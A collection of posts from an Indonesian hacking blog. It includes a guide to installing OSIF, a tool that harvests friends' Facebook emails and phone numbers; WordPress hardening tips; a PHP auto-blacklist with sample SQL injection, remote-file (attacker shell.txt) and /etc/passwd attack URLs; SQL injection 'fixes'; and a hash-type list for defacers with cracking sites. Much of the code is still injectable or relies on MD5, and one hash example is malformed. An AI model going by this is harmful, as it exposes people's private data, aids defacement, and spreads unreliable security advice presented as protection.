Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.
Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Tutorial install dan penggunaan osif di Termux , OSIF (Open Source Information Facebook)

Rio Setyawan 4:04 PM
OSIF (Open Source Information Facebook) merupakan tool berfungsi untuk melihat data-data penting seperti email, nomor hp, dan ID facebook pada akun teman kalian


Bukan hanya itu saja , masih banyak fitur di dalam tools osif
Antara lain auto colek, auto reaction, auto konfirmasi pertemanan, hapus semua status, hapus semua foto, unfollow semua teman dll.

Penasaran? Yuk langsung ke tutorial install nya.


  • Update dan upgrade termux dengan perintah

apt update && apt upgrade


  • Karena tool ini menggunakan bahasa pemrograman python maka harus install python terlebih dahulu dengan command

apt install python2


  • Kemudian install mechanize

pip2 install requests mechanize


  • Install git dengan perintah

apt install git


  • Clone tool OSIF nya dengan perintah

git clone https://github.com/CiKu370/OSIF.git


  • Masuk ke directory osif

cd OSIF


  • Install tool nya dengan perintah

pip2 install -r requirements.txt


  • Dan sekarang tinggal menjalankan tool OSIF dengan command

python2 osif.py


  • Login akun fb kalian dgn command

token



  • Masukan perintah help untuk melihat semua fitur osif dgn command

help

Sekian dulu artikel tentang osif, jika bingung bisa kontak melalu kontak form atau lewat komentar di bawah, terima kasih semoga bermanfaat.

Biar lebih jelas lihat video di bawah ini



Tips mengamankan website CMS wordpress dari hacker

Rio Setyawan 4:35 AM
Tips mengamankan website CMS wordpress dari hacker
Idiot Attacker - WordPress menggunakan platform conten management system atau CMS. CMS merupakan sistem operasi untuk menangani website secara dinamis agar mudah dalam pengelolaannya. Karena itulah platform wordpress paling banyak digunakan untuk melakukan manajemen website.
 

saya dulu juga pengguna cms ini, jujur saya juga suka sama cms ini, terutama sama plugin-plugin nya, banyak plugin-plugin yang bisa di install di cms kita sesuai kebutuhan website kita,
Baca juga:

Di balik kelebihan juga ada kekurangan, berikut daftar celah wordpress yang sering disusupi hacker dan tips cara penangananya.

1. Plugin

Menurut dari pantuan saya dari web zone-h (zone-h.org), zone-h adalah website yang di gunakan oleh para hacktivis untuk mensubmid hasil deface nya, dari websiite itu menurut saya hampir 80% yang deface web wordpress berasal dari celah plugin nya, karena plugin wordpress ini gak 1 pengembang sama wordpress,
Tips: Selalu update plugin jika ada pembaruan, dan jangan asal install plugin,
bisa kalian cek di exploit-db plugin mana aja yang terdapat celahnya disini

2. Form login admin

Karena CMS ini sifatnya open source jadi siapa aja tau di mana path admin login nya, jadi ini bisa di manfaatkan hacker untuk melalukan penyerangan lewat bruteforce,
Bruteforce adalah sebuah teknik serangan yang menggunakan percobaan terhadap semua list kunci password yang memungkinkan atau istilah gampangnya mungkin menggunakan Random password/ password acak.
Tips: Gunakan password yang aman, jangan pake nama domain, nama kalian atau kata kunci yang mudah di tebak dan pasang plugin cache biar aman dari serangan bruteforce disini.


Itu dia sedikit tips mengamankan cms wordpress dari serangan hacker, sekian semoga bermanfaat


Tag: cara mengamankan wordpress, cara mengamankan website, tips mengamankan website, cms wordpress, kelebihan dan kekurangan wordpress

Mengamankan web dengan Auto Blacklist

Rio Setyawan 5:39 PM
Mengamankan web dengan Auto Blacklist

Assalamualaikum,
Pagi ini saya mau berbagi tutorial Mengamankan web dengan Auto Blacklist yang saya dapat dari forum Hacker newbie.
Dimana apabila ada attacker yang mau nyoba-nyoba dengan web kita menggunakan tehnik SQL Injection maupun LFI/RFI maka web akan secara otomatis memasukan IPnya ke daftar blacklist dan secara otomatis mengalihkan attacker ke halaman yang sudah kita tentukan sebelumnya.

Oke langsung saja ke tutorialnya.

Pertama buatlah sebuah tabel pada database kamu, contoh tabel blacklist
 CREATE TABLE `blacklist` (
`ip_attacker` varchar(50) NOT NULL
) 

Sekarang kita akan membuat sebuah file yang akan mendeteksi gerak-gerik sang attacker tersebut, dan apabila terdeteksi melakukan sesuatu hal yang dianggap melakukan Pengijeksiaan maka akan otomatis menyalin IP attacker tersebut

file "blacklist.php"
 <?
//Deteksi user yang memasukan sebuah perintah penginjesian terhadap web kita
if(strpos($_SERVER['REQUEST_URI'], "%27") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "http://") || strpos($_SERVER['REQUEST_URI'], "www.") || strpos($_SERVER['REQUEST_URI'], "../") || strpos($_SERVER['REQUEST_URI'], "etc/passwd")) {

//Apabila terdeteksi melakukan penginjeksian, ambil IP mereka
$ip = $_SERVER['REMOTE_ADDR'];

//Kirim IP ke database kita
$kirim_ip = mysql_query("INSERT INTO blacklist VALUE ('$ip')");
}
?> 


Setelah itu masuk ke file yang kamu rasa dapat di injeksi, saya contohkan file index.php

Contoh Penginjeksian oleh attacker

www.webkamu.com/index.php?id=1' (SQL Injection)
www.webkamu.com/index.php?page=http://www.root.attacker/shell.txt (RFI/LFI)
www.webkamu.com/index.php?page=../../etc/passwd (RFI/LFI)

Untuk penjelasan tehnik diatas mungkin bisa di googling sendiri atau mungkin sudah banyak yang tahu.

Oke Next..

Setelah masuk ke file index.php lakukan pengonekan pada file blacklist.php, gunakan fungsi include()
 include "blacklist.php"; 

Terus jangan lupa lakukan penganalisian IP, untuk mengalihkan attacker ke tempat lain apabila attacker mengakses web kita lagi.
 <?
//Periksa IP attacker tersebut apa pernah masuk ke database kita
$ipattacker = mysql_query("SELECT * FROM blacklist where ip_attacker = '".$_SERVER['REMOTE_ADDR']."'");
$konfirmasi_attacker = mysql_num_rows($ipattacker);

//Apabila IP telah terdeteksi pernah masuk ke database maka alihkan attacker ke halaman lain, contoh :google.com
if ($konfirmasi_attacker !== 0) {
header('Location:http://google.com');
}
?> 

Sekian, semoga sedikit membantu dalam pengamanan web kita dari tangan-tangan jahil



Tag: cara mengamankan website, cara auto blacklist di web, membuat auto blacklist website, blacklist website, tips mengamankan website

Cara Menutup Bug SQL Injection

Rio Setyawan 12:59 PM
Cara Menutup Bug SQL Injection
Artikel ini saya dapat dari Blog sebelah, sebagai pengingat saya juga , saya buat artikel disini. Karena saya menulis untuk saya baca kembali :)
bukan 100% saya copas semua gan, masih saya edit-edit lagi biar rapi dan  lebih jelas bacanya :D


Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)



Cara Menutup Bug SQL Injection

1. Dengan cara menjadikan variabel get menjadi absolute integer
    Penjelasan:
    Biasanya para hacker melakukan penetrasi terhadap variabel id yang kita letakkan pada url..
  
    Contoh:
    pada url http://webkamu/berita.php?id=1
    ketika akan membaca isi dari variabel id biasanya kita menggunakan syntak
   
    $id = $_GET['id'];
    jadi setiap isi dari id pada url akan disimpan pada variable $id..
   
    dan untuk query ke database :
    "SELECT * FROM tbl_berita WHERE id='$id'"
    Nah melalui variabel $id ini lah para hacker menggunakan teknik SQL Injection, dengan   memasukkan    perintah2 SQL yang dapat mengeksploitasi database..
Solusinya:
kita buat id menjadi absolute integer dengan mengubah sintaks pembacaan variabel get id menjadi:
    $id = abs((int)$_GET['id']);
 fungsi abs() digunakan untuk menghilangkan tipe data minus dan int digunakan untuk mengubah tipe data menjadi integer (hanya mengijinkan tipe data integer). jadi ketika variabel id pada url di rubah secara manual dan diisi dengan sintak SQL yang berupa string maka tetap dibaca 0. 
2. Dengan menambahkan variabel get berisi enkripsi md5 yg divariasi pada url
 Jika awal url adalah
     http://webkamu/berita.php?id=1
 Maka kita akan menambahkan variabel yg berisi enkripsi dari id yg kita modifikasi dengan string acak menjadi
     http://webkamu/berita.php?id=1&token=9b0443e36affedbafe882a4bbb90eaec
nah sekilas terlihat mirip sama url facebook.. wahh kereeen :)

ok, saya jelaskan maksud dari variabel token diatas, jadi ketika awal kita memberikan link untuk next berita or previous berita atau berita lainnya.. pokok nya yang menampilkan berita lain dah.. kita isi
$token = md5(md5($id_berita).md5('kata acak'));
jadi href nya menjadi : berita.php?id=$id_berita&token=$token
sekarang pada halaman tampil berita kita tambahkan pengecekan apakah id berita diganti/diinject manual oleh user dengan cara :
$id_berita=$_GET['id_berita'];
$token=$_GET['token'];
$cek=md5(md5($id_berita).md5('kata acak'));
if($token==$cek){
   //syntak menampilkan berita disini
}
else{
   echo "SQL Injection detected..!!!!";
}
3. Khusus untuk form login, dengan melakukan enkripsi password atau merubah algoritma autentikasi login.
 Biasanya kita melakukan pengecekan ketika user login yaitu dengan melakukan query kedatabase:
$input_username=$_POST[username];
$input_password=$_POST[password];
$q="SELECT * FROM tbl_user where username='$input_username' and password='$input_passsword'";
$r=mysql_query($q);
$jml_row=mysql_num_rows($r);
if($jml_row > 0){
     echo "login sukses";
}
else{
     echo "login gagal";
}
nah algoritma autentikasi login seperti diatas sangat rentan terhadap penetrasi SQL Injection..
solusi pertama dengan melakukan enkripsi pada password yaitu dengan mengganti
skrip berikut :
$input_password=$_POST[password]; menjadi:
$input_password=md5(md5($_POST[password]).md5('karakter acak'));
tentunya yang berakibat dengn mengenkripsi semua password di database sesuai enkripsi diatas.. :)
(semoga ga pada pusing yah :D)
solusi kedua yaitu dengan merubah algoritma menjadi
$d=mysql_fetch_array($r);
if($jml_row >0 && ($d[password]==$input_password))           


di tambah pengecekan inputan password terhadap password di database



Arpns1986x

Macam-macam contoh tipe hash

Rio Setyawan 6:22 AM
Macam-macam contoh tipe hash

Mungkin kalian yang suka deface dengan metode SQL Injection sering menemui macam-macam hash kan, Tapi bingung nentuin itu hash tipe apa, ini sedikit contoh-contoh tipe hash bagi yang bingung mengetahui tipe hash, nanti tinggal cari enkripsinya
Baca juga: Tutorial deface with SQLMAP and ACUNETIX 


Ada beberapa tipe hash diantaranya :
1.MD4 (Message-Digest algortihm 4)
– MD4 dibuat oleh Ronald Rivest pada Oktober 1990, MD4 adalah hash function yang dipakai sebelum MD5, namun karena banyaknya kelemahan MD4 membuatnya diganti oleh MD5.
– panjang 16 bytes (32 karakter)
– contoh : 31d6cfe0d16ae931b73c59d7e0c089c0
2. MD5 (Message-Digest algortihm 5)
– MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (http://id.wikipedia.org/wiki/MD5)
– digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
– panjangnya 16 bytes (32 karakter)
– contoh : c4ca4238a0b923820dcc509a6f75849b
3. MD5($pass.$salt)
– Digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
– panjang 16 bytes (32 karakter)
– hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
– contoh : 6f04f0d75f6870858bae14ac0b6d9f73
4. MD5($salt.$pass)
– Digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
– panjang 16 bytes (32 karakter)
– hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
– contoh : f190ce9ac8445d249747cab7be43f7d
5. md5(md5($pass).$salt)
– Digunakan di vBulletin, IceBB dan cms lainnya
– panjang 16 bytes (32 karakter)
– contoh : 6011527690eddca23580955c216b1fd2
6. MD5(WordPress)
– Digunakan di wordpress
– panjangnya 17 bytes (34 karakter)
– hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf “B”) kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah “12345678″) lalu dilanjutkan oleh hashnya
– contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01
7. MD5(phpBB3)
– Digunakan di CMS phpBB 3.x.x
– panjangnya 17 bytes (34 karakter)
– hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor “9″), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) kemudian dilanjutkan oleh hashnya
– contoh : $H$9123456785DAERgALpsri.D9z3ht120
8. SHA-1(Secure Hash Algorithm)
– Diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard digunakan oleh beberapa CMS dan beberapa forum
– panjangnya 20 bytes (40 karakter)
– contoh : 356a192b7913b04c54574d18c28d46e6395428ab
9. SHA-256(Secure Hash Algorithm)
– hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
– panjang 55 karakter
– contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi…
10. SHA-512(Secure Hash Algorithm)
– hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
– panjang 98 karakter
– contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm…
11. Base64
– algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan “=”
– digunakan di beberapa forum dan CMS
– contoh : Y3liZXJfY3JpbWluYWw=
Situs untuk mengcrack hash:
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
http://hashkiller.co.uk ( ini yang menurut saya paling mantep :D )
dan masih banyak lagi